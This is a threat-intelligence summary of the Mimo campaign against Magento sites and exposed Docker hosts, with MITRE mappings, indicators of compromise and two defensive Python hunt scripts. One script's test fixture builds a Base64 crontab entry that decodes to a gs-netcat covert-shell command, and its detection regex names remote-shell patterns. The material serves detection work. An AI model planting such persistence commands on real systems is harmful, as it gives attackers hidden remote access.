Beyond Mimo’lette: Tracking Mimo’s Expansion to Magento CMS and Docker

The Mimo threat actor has expanded from Craft CMS to Magento ecommerce sites, gaining initial access through PHP-FPM command injection and relying on GSocket for covert remote access and on the memfd_create() syscall for in-memory payload execution. Its operations combine cryptomining and proxyjacking for dual monetization and now extend to exposed Docker instances, showing growing sophistication and diversification. #Mimo #Magento #GSocket #memfd_create #IPRoyal

Keypoints

  • Mimo has shifted from Craft CMS to compromising Magento ecommerce sites, gaining initial access through PHP-FPM command injection.
  • Remote access is maintained with GSocket (gs-netcat): the implant connects outbound to the Global Socket relay network and the operator reaches it through the same relay, so the shell works behind firewalls and NAT with no listening port or port forwarding, and the traffic is end-to-end encrypted.
  • Payloads are executed from an anonymous file created with the memfd_create() syscall, so the executable never touches disk and file-based scanners and integrity checks do not see it.
  • Compromised hosts are monetized twice: cryptojacking with a UPX-packed XMRig build and proxyjacking with the IPRoyal Pawns client, which resells the victim's bandwidth as residential proxy capacity.
  • Hosts with an exposed, unauthenticated Docker Engine API are used to deploy malicious containers, extending the campaign beyond CMS platforms.
  • The Go-based modular binaries bundle persistence, evasion, SSH-based propagation and payload execution.
  • Operational security includes rotating C2 servers, naming processes after Linux kernel threads so they blend into process listings, and broad credential-based lateral movement attempts, including against AWS environments.
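Two of the host-level behaviours listed above leave a reliable trace in /proc: a binary run from a memfd_create() file shows up as an exe link of the form "/memfd:<name> (deleted)", and a user-space process that has renamed itself after a kernel thread still has an exe target and a command line, which genuine kernel threads never have. The following hunt script is an added example, not code from the Datadog write-up or from the Mimo tooling; it walks a /proc-style tree and flags both cases. The fixture it builds is constructed for offline testing (the kernel-thread name list, the pid numbers and the paths are assumptions), and on a real host it should be run as root and pointed at /proc.

```python
import os
import re
import tempfile

# Kernel-thread name prefixes to watch. A genuine kernel thread has no
# /proc/<pid>/exe target and an empty cmdline, so a process with such a
# name that has either is user-space code in disguise. (Assumed list,
# not taken from the article.)
KTHREAD_RE = re.compile(
    r"^\[?(kworker|ksoftirqd|kthreadd|migration|rcu_|kswapd|khugepaged|kcompactd)"
)


def read_bytes(path):
    """Read a proc file, returning b'' if it vanished or is unreadable."""
    try:
        with open(path, "rb") as f:
            return f.read()
    except OSError:
        return b""


def exe_target(pid_dir):
    """readlink /proc/<pid>/exe; '' for kernel threads and exited processes."""
    try:
        return os.readlink(os.path.join(pid_dir, "exe"))
    except OSError:
        return ""


def scan_proc(proc_root="/proc"):
    """Walk a /proc tree and return (memfd_hits, masquerade_hits), each a
    sorted list of (pid, comm, detail) tuples."""
    memfd_hits, masquerade_hits = [], []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        pid_dir = os.path.join(proc_root, name)
        comm = read_bytes(os.path.join(pid_dir, "comm")).decode("utf-8", "replace").strip()
        cmdline = read_bytes(os.path.join(pid_dir, "cmdline")).replace(b"\0", b" ").strip()
        exe = exe_target(pid_dir)
        # An executable created with memfd_create() is reported by the kernel
        # as "/memfd:<name> (deleted)"; nothing on disk corresponds to it.
        if exe.startswith("/memfd:"):
            memfd_hits.append((int(name), comm, exe))
        # Kernel-thread-looking name on something that has a backing binary
        # or a command line: a masquerading user-space process.
        if KTHREAD_RE.match(comm) and (exe or cmdline):
            masquerade_hits.append(
                (int(name), comm, exe or cmdline.decode("utf-8", "replace"))
            )
    return sorted(memfd_hits), sorted(masquerade_hits)


def build_fixture():
    """Constructed /proc look-alike for offline testing (not a real capture):
    two genuine kernel threads, one memfd-backed miner and one fake kworker
    backed by a binary on disk. Pids, names and paths are assumptions."""
    root = tempfile.mkdtemp(prefix="fakeproc_")

    def add(pid, comm, cmdline=b"", exe=None):
        d = os.path.join(root, str(pid))
        os.makedirs(d)
        with open(os.path.join(d, "comm"), "w") as f:
            f.write(comm + "\n")
        with open(os.path.join(d, "cmdline"), "wb") as f:
            f.write(cmdline)
        if exe is not None:
            # Dangling symlink, exactly what /proc shows for a deleted file.
            os.symlink(exe, os.path.join(d, "exe"))

    add(2, "kthreadd")
    add(15, "kworker/0:1")
    add(4242, "kworker/u8:3", b"./4l4md4r\0", "/tmp/4l4md4r")
    add(4243, "xmrig-C3", b"xmrig-C3\0-o\0pool:3333\0", "/memfd:xmrig (deleted)")
    return root


if __name__ == "__main__":
    root = build_fixture()
    memfd_hits, masquerade_hits = scan_proc(root)
    print("memfd-backed executables:", memfd_hits)
    print("fake kernel threads:", masquerade_hits)
```

Reading /proc/<pid>/exe for processes owned by other users requires root, so run the scan as root or the masquerade check will silently miss most of the machine; an empty exe target alone is therefore not proof of a genuine kernel thread, which is why the script also checks cmdline.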

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Initial access through PHP-FPM command injection reached via a Magento CMS plugin (“initial access vector is PHP-FPM command injection via a Magento CMS plugin”).
  • [T1071] Application Layer Protocol / [T1572] Protocol Tunneling – GSocket establishes an encrypted, outbound-only tunnel through the Global Socket relay network, so the shell reaches hosts behind firewalls and NAT without port forwarding (“Connects through restrictive network configurations without port forwarding”).
  • [T1543.002] Create or Modify System Process: Systemd Service, [T1037.004] Boot or Logon Initialization Scripts: RC Scripts and [T1053.003] Scheduled Task/Job: Cron – Persistence through systemd service units, the legacy rc.local script and crontab entries (“Persistence is achieved via multiple techniques including SystemD service units, Legacy rc.local initialization, Scheduled tasks”).
  • [T1059.004] Command and Scripting Interpreter: Unix Shell with [T1027] Obfuscated Files or Information – Shell scripts and cron entries carry Base64-encoded commands that decode to an invocation of the GSocket binary, keeping remote access alive across reboots (“sample created a Base64-encoded string within a Crontab entry which decodes to a command that executes the GSocket binary”).
  • [T1620] Reflective Code Loading – Payloads are written to an anonymous in-memory file created with memfd_create() and executed from there, so no executable is written to disk; the payload runs in the malware's own process rather than being injected into another one (“using the memfd_create() syscall to create an anonymous temporary file in memory that has an executable bit”).
  • [T1552.004] Unsecured Credentials: Private Keys and [T1021.004] Remote Services: SSH – Gathers SSH keys from the host and tries them with a list of hard-coded usernames to move laterally (“attempts to create an SSH connection using keys gathered… hard-coded usernames admin, ubuntu, dev, ec2-user”).
  • [T1496] Resource Hijacking – Cryptojacking and proxyjacking turn the victim's CPU and bandwidth into revenue (“deploying a UPX-packed XMRig variant…, installs hezb.x86_64 – the IPRoyal Pawns client”).
  • [T1016] System Network Configuration Discovery and [T1046] Network Service Discovery – Determines its own public IP and probes the local subnet for SSH targets (“determines its own public IP address… attempts to create SSH connections to random hosts within the local subnet”).
  • [T1036] Masquerading – Gives malicious processes kernel-thread-like names so they blend into process listings (“process name designed to look like a legitimate or kernel-managed thread”).
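The Base64-in-crontab persistence described in the list above is easy to triage once the blob is decoded, because the decoded command names the binary it launches. The script below is an added example, not code from the Datadog report: it pulls every "echo <base64> | base64 -d" pipeline out of a crontab dump, decodes it and flags decoded commands that reference GSocket/gs-netcat, memfd tricks or a download piped straight into a shell. The sample crontab is constructed, and the GSocket command it decodes to (its path, secret placeholder and gs-netcat flags) is an assumption about what such an entry looks like, not a sample quoted from the report.

```python
import base64
import binascii
import re

# "echo <b64> | base64 -d" (or --decode) piped into a shell is the shape the
# report quotes; this pulls the Base64 blob out of each crontab line.
B64_PIPE_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/]{24,}={0,2})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b"
)
# Decoded commands worth a second look: GSocket/gs-netcat, memfd tricks,
# bash /dev/tcp shells, curl or wget piped into a shell. (Assumed list.)
SUSPICIOUS_RE = re.compile(
    r"gs-netcat|gsocket|memfd|/dev/tcp/|(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b", re.I
)


def decode_cron_entries(crontab_text):
    """Return one (line_no, schedule, decoded_command, suspicious) tuple per
    Base64-piped command found in the crontab text."""
    findings = []
    for line_no, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        # "@reboot"-style specials are one token; normal entries use five fields.
        schedule = tokens[0] if tokens[0].startswith("@") else " ".join(tokens[:5])
        for m in B64_PIPE_RE.finditer(line):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except binascii.Error:
                continue  # looked like Base64 but is not; skip it
            findings.append((line_no, schedule, decoded, bool(SUSPICIOUS_RE.search(decoded))))
    return findings


# Constructed sample crontab (not captured from a compromised host). The
# gs-netcat command line is an assumption about what such an entry decodes to.
_GS_CMD = b"nohup /var/tmp/.x/gs-netcat -s REDACTED_SECRET -liqD >/dev/null 2>&1 &"
_BENIGN_CMD = b"/usr/bin/uptime >> /var/log/uptime.log"
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1",
    "@reboot echo %s | base64 -d | bash" % base64.b64encode(_GS_CMD).decode(),
    "*/5 * * * * echo %s | base64 -d | sh" % base64.b64encode(_BENIGN_CMD).decode(),
])

if __name__ == "__main__":
    for line_no, schedule, cmd, bad in decode_cron_entries(SAMPLE_CRONTAB):
        print(f"line {line_no} [{schedule}] {'SUSPICIOUS' if bad else 'ok'}: {cmd}")
```

Feed it the output of `crontab -l` for every user plus the contents of /etc/crontab and /etc/cron.d/*; a Base64 pipeline is rare in legitimate cron entries, so even the entries that decode to something benign are worth a glance.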

Indicators of Compromise

  • [IP Address] Command and Control servers – 109.205.213.203 (initial C2), 193.32.162.10 (secondary C2), 15.188.246.198 (payload hosting server)
  • [Domain] GSocket infrastructure – g.gsocket.ninja, d.gsocket.ninja
  • [File Hash] GSocket configuration script – gsocket.sh, SHA256: 2171deb9293361fd801691948264ad8dc7864935140834449307d040a6d67787
  • [File Hash] Covert GSocket shell binary – gs-netcat_mini-linux-x86_64, SHA256: d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa
  • [File Hash] Dropper script – 4l4md4r.sh, SHA256: bf2727a50a1c083fe478de1e51bded8a8eea6d6f1d02855161df8be42965f976
  • [File Hash] Docker variant ELF loader/stager – 4l4md4r, SHA256: ef108d6f7d9f2fe240a32f2cde594d3e54319237cedd21d13ab5e10ad4d05dbb
  • [File Hash] LD_PRELOAD rootkit – alamdar.so, SHA256: 7868cb82440632cc4fd7a451a351c137a39e1495c84172a17894daf1d108ee9a
  • [File Hash] Monero miner – xmrig-C3, SHA256: 4f509762ff7a65e56780f5b1fee10aaed267fe4b15182059480541fc7ce47923
  • [File Hash] Proxyware – hezb.x86_64, SHA256: 1aa4d88a38f5a27a60cfc6d6995f065da074ee340789ed00ddc29abc29ea671e


Read more: https://securitylabs.datadoghq.com/articles/beyond-mimolette-tracking-mimo-expansion-magento-cms-docker/